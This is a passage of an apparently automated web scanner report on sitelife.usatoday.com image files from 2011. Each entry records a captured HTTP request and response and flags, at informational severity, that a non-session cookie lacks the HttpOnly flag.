Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 6118
Content-Type: image/png
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "469381b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

.PNG
.
...IHDR....... .......<.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..].T.W........@..."DAl@Q...8 .#j61.Dg49g&c.d..3....d..d...1N.D..y.w....c...8.@.FA...AE%.l.Q....._U......N.:U..._.W...{.
...[SNIP]...

14.86. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/comments/pluck-comm-background.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-background.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 202
Content-Type: image/png
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "469381b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...lIDATx.... .0..AY..8P.
..].a.3%l.Ww.......D.....J..M ......r........ 3...... .........2c................O.......l......IEND.B
...[SNIP]...

14.87. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 386
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "a1f583b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.......................................................................................................|~.lmn.......................................fff...........................................
...[SNIP]...

14.88. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

14.89. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 657
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "a1f583b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

GIF89a..................................................................................................................................................................................................
...[SNIP]...

14.90. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-avatar-blocked.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-avatar-blocked.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 939
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "b21c8bb51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a(.(...................................vv.nn................mm..................................rr..........nn..........{{...................................................................mm....
...[SNIP]...

14.91. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 643
Content-Type: image/jpeg
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "b21c8bb51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
...........Q................... ... .......

.

.......................................................................................
...[SNIP]...

14.92. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-pagination-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-bg.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 1448
Content-Type: image/jpeg
Last-Modified: Wed, 31 Aug 2011 20:15:32 GMT
Accept-Ranges: bytes
ETag: "1da43bc1a68cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
...r...3...V................... ... .......

.

.......................................................................................
...[SNIP]...

14.93. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-primary-button-left.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-primary-button-left.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 638
Content-Type: image/png
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "d7f8db51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

.PNG
.
...IHDR...,.................tEXtSoftware.Adobe ImageReadyq.e<... IDATx....k.A...g....$.)..A...X.....7.XY..cmsDm..!(.Q....5....+b.r....Yg..]1..O...,<.fv.../=..w.u.@.j.kw....E....XEQ$...... Y.
...[SNIP]...

14.94. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-primary-button-right.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-primary-button-right.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 440
Content-Type: image/png
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "d7f8db51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

.PNG
.
...IHDR..............L_.....tEXtSoftware.Adobe ImageReadyq.e<...ZIDATx.tQ.JBA.=3.7$...=(......hQH....h.......6.I.P[w."Zd..LA....z......:.....g....;...A*iq..)W...Z.l#}i..6..sX.....aN...i.ABa.
...[SNIP]...

14.95. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 587
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "d7f8db51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

GIF89a........................N..Q..R..T..T..U..V..X..W..W..W..Z..X..\..[..\..\..\..]..^..d...............................................P..X..b....................W.....B..U..]..y...................
...[SNIP]...

14.96. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 607
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "d7f8db51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

GIF89a.....Y...........kk...................AA.]].33...................ii................[[..........ss...................ee....??..........QQ.WW.==.UU.//..........##...................aa.ww.......OO.
...[SNIP]...

14.97. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 229
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "68e18fb51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

GIF89a.......................................................................................................!.......,..........b &.W9..e........u.e>.H...Y.RJ..GWeAP8.:S%@XX...r@`x.`...G...z.v(...|N
...[SNIP]...

14.98. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/throbber.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/throbber.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 3951
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "68e18fb51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:20 GMT
Connection: close

GIF89a.....................N.........!..NETSCAPE2.0.....!..Created with ajaxload.info.!..
...,................=.....|...7........YI....k.......@.N.#..6Z.vd.tE'.y.V.J.49...W.5.]...oY.^..j..,g..>......
...[SNIP]...

14.99. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/throbber_circle.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/throbber_circle.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
